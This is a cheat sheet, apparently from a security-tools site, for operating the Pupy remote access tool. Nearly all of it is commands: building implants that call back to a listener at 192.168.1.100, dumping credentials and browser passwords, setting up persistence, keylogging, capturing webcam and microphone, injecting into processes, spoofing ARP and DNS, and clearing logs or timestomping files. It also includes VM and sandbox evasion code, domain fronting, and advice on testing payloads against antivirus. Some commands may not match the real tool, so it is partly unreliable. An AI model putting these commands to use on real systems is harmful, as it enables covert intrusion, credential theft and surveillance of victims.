Pupy C2 Framework Cheat Sheet

Overview

Pupy is an open-source, cross-platform Remote Access Tool (RAT) and post-exploitation framework written in Python and C. It supports Windows, Linux, OSX, and Android platforms with memory-only execution capabilities and minimal footprint design.

⚠️ Warning: This tool is intended for authorized penetration testing and red team exercises only. Ensure you have proper authorization before using in any environment.

Installation

Git Installation

# Clone repository
git clone --recursive https://github.com/n1nj4sec/pupy.git
cd pupy

# Install dependencies (Ubuntu/Debian)
sudo apt-get install python2.7-dev python-pip python-setuptools build-essential swig python-dev libssl-dev libffi-dev

# Install Python requirements
pip install -r pupy/requirements.txt

# Create workspace
./create-workspace.py -DG pupyws
cd pupyws

Docker Installation

# Build Docker image
git clone --recursive https://github.com/n1nj4sec/pupy.git
cd pupy
docker build -t pupy .

# Run Pupy in Docker
docker run -it -v /tmp/pupyws:/opt/pupy/pupyws pupy

Windows Installation

# Install Python 2.7
# Download and install Microsoft Visual C++ Compiler for Python 2.7
# Clone repository
git clone --recursive https://github.com/n1nj4sec/pupy.git
cd pupy

# Install requirements
pip install -r pupy/requirements.txt

# Create workspace
python create-workspace.py pupyws
cd pupyws

Basic Usage

Starting Pupy Server

# Start server with default configuration
./pupysh

# Start with custom configuration
./pupysh --config custom_config.py

# Start with specific transport
./pupysh --transport ssl

Client Generation

# Generate Windows client
gen -f client -O windows -A x86 -o windows_client.exe

# Generate Linux client
gen -f client -O linux -A x64 -o linux_client

# Generate Android APK
gen -f apk -o android_client.apk

Command Reference

Server Management

Command	Description
help	Show help menu
sessions	List active sessions
session -i <id>	Interact with session
jobs	List running jobs
kill <job_id>	Kill running job
exit	Exit Pupy server

Client Generation

Command	Description
gen -h	Show generation help
gen -f client -O <os> -A <arch>	Generate client
gen -f apk	Generate Android APK
gen -f py	Generate Python payload
gen -f ps1	Generate PowerShell payload

Session Interaction

Command	Description
info	Show session information
shell	Get interactive shell
upload <local> <remote>	Upload file
download <remote> <local>	Download file
screenshot	Take screenshot
webcam_snap	Take webcam snapshot
keylogger	Start keylogger

Client Generation Options

Windows Clients

# Windows executable (x86)
gen -f client -O windows -A x86 -o windows_x86.exe

# Windows executable (x64)
gen -f client -O windows -A x64 -o windows_x64.exe

# Windows DLL
gen -f dll -O windows -A x86 -o windows_dll.dll

# Windows service executable
gen -f client -O windows -A x64 --service -o windows_service.exe

# PowerShell payload
gen -f ps1 -o payload.ps1

Linux Clients

# Linux ELF (x86)
gen -f client -O linux -A x86 -o linux_x86

# Linux ELF (x64)
gen -f client -O linux -A x64 -o linux_x64

# Linux shared library
gen -f so -O linux -A x64 -o linux_lib.so

# Python payload
gen -f py -o payload.py

macOS Clients

# macOS binary
gen -f client -O darwin -A x64 -o macos_client

# macOS application bundle
gen -f app -O darwin -A x64 -o macos_app.app

Android Clients

# Android APK
gen -f apk -o android_client.apk

# Android APK with custom package name
gen -f apk --package com.example.app -o custom_android.apk

Transport Options

SSL Transport

# Start SSL listener
listen --port 443 ssl

# Generate client with SSL transport
gen -f client -O windows -A x64 --transport ssl_connect --host 192.168.1.100:443

HTTP Transport

# Start HTTP listener
listen --port 80 http

# Generate client with HTTP transport
gen -f client -O windows -A x64 --transport http --host 192.168.1.100:80

TCP Transport

# Start TCP listener
listen --port 4444 tcp

# Generate client with TCP transport
gen -f client -O windows -A x64 --transport tcp_cleartext --host 192.168.1.100:4444

Obfuscated Transports

# Obfs3 transport
listen --port 8080 obfs3

# Generate client with obfs3
gen -f client -O windows -A x64 --transport obfs3 --host 192.168.1.100:8080

Post-Exploitation Modules

System Information

# Get system information
run sysinfo

# Get environment variables
run getenv

# Get installed software
run installed_software

# Get running processes
run ps

# Get network connections
run netstat

Credential Harvesting

# Dump Windows credentials
run hashdump

# Extract browser passwords
run browser_dump

# Dump WiFi passwords
run wifi_passwords

# Extract clipboard content
run clipboard

Persistence

# Install persistence
run persistence

# Create scheduled task (Windows)
run schtasks

# Registry persistence (Windows)
run registry_persistence

# Cron job persistence (Linux)
run cron_persistence

Network Operations

# Port scanning
run portscan -t 192.168.1.0/24

# Network discovery
run network_discovery

# ARP spoofing
run arp_spoof -t 192.168.1.10 -g 192.168.1.1

# DNS spoofing
run dns_spoof -d example.com -i 192.168.1.100

Surveillance

# Start keylogger
run keylogger

# Take screenshot
run screenshot

# Record microphone
run record_mic -t 30

# Webcam snapshot
run webcam_snap

# Webcam stream
run webcam_stream

Advanced Features

Memory Execution

# Load module in memory
load_module /path/to/module.py

# Execute in memory
run memory_exec -f /path/to/executable

# Reflective DLL loading (Windows)
run reflective_dll -f /path/to/dll.dll

Process Injection

# Inject into process
run inject -p <pid> -f /path/to/payload

# Process hollowing
run process_hollow -t notepad.exe -f /path/to/payload

# DLL injection
run dll_inject -p <pid> -f /path/to/dll.dll

Pivoting

# SOCKS proxy
run socks -p 1080

# Port forwarding
run portfwd -L 8080:192.168.2.10:80

# Reverse port forwarding
run portfwd -R 9090:127.0.0.1:22

Anti-Forensics

# Clear event logs (Windows)
run clear_logs

# Timestomp files
run timestomp -f /path/to/file -t "2020-01-01 12:00:00"

# Secure delete
run secure_delete -f /path/to/file

# Clear tracks
run clear_tracks

Evasion Techniques

Payload Obfuscation

# Generate with packer
gen -f client -O windows -A x64 --packer upx -o packed_client.exe

# Custom obfuscation
gen -f client -O windows -A x64 --obfuscate -o obfuscated_client.exe

# Encrypted payload
gen -f client -O windows -A x64 --encrypt -o encrypted_client.exe

Anti-Analysis

# VM detection
def check_vm():
    import subprocess
    try:
        output = subprocess.check_output(['systeminfo'], shell=True)
        vm_indicators = ['VMware', 'VirtualBox', 'QEMU', 'Hyper-V']
        for indicator in vm_indicators:
            if indicator in output.decode():
                return True
    except:
        pass
    return False

# Sandbox evasion
import time
import random
time.sleep(random.randint(60, 300))  # Random sleep

Traffic Obfuscation

# Domain fronting
gen -f client -O windows -A x64 --transport http --host cdn.example.com --front-domain legitimate-site.com

# Custom User-Agent
gen -f client -O windows -A x64 --transport http --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

Configuration

Server Configuration

# pupy.conf
[pupyd]
workdir = pupyws
scriptlets_path = packages/all;packages/windows;packages/linux;packages/darwin

[ssl]
keyfile = keys/server.key
certfile = keys/server.crt

[http]
port = 80
ssl_port = 443

[logging]
level = INFO
file = pupy.log

Client Configuration

# Custom transport configuration
TRANSPORT_KWARGS = {
    'ssl': {
        'cert_reqs': ssl.CERT_NONE,
        'ssl_version': ssl.PROTOCOL_TLSv1_2,
        'ciphers': 'ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM'
    },
    'http': {
        'user_agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'headers': {'Accept': 'text/html,application/xhtml+xml'},
        'proxy': {'http': 'http://proxy:8080'}
    }
}

Troubleshooting

Connection Issues

# Check listener status
jobs

# Test connectivity
telnet server_ip port

# Check firewall rules
iptables -L
netsh advfirewall show allprofiles

Client Generation Problems

# Install missing dependencies
pip install -r pupy/requirements.txt

# Rebuild client templates
./create-workspace.py -DG pupyws

# Check Python version
python --version  # Should be 2.7.x

Module Loading Errors

# Update module path
export PYTHONPATH=$PYTHONPATH:/opt/pupy/pupy

# Reinstall requirements
pip install --upgrade -r pupy/requirements.txt

# Check module dependencies
python -c "import module_name"

Performance Issues

# Reduce beacon interval
session -i <id>
set_beacon_interval 30

# Optimize transport
# Use faster transports like TCP for internal networks
# Use compressed transports for slow connections

Operational Security

Infrastructure Setup

• Use redirectors and proxy chains
• Implement proper certificate management
• Use legitimate domains and hosting
• Rotate infrastructure regularly
• Monitor for detection and attribution

Communication Security

• Use encrypted transports (SSL/TLS)
• Implement proper key management
• Use domain fronting where possible
• Vary communication patterns
• Implement proper error handling

Payload Security

• Use obfuscation and packing
• Implement anti-analysis techniques
• Use staged payloads when possible
• Regularly update and rotate payloads
• Test against current AV solutions

Resources

• Pupy GitHub Repository
• Pupy Documentation
• n1nj4sec Blog
• Pupy Modules Reference

---

This cheat sheet provides a comprehensive reference for using Pupy C2 Framework. Always ensure you have proper authorization before using this tool in any environment.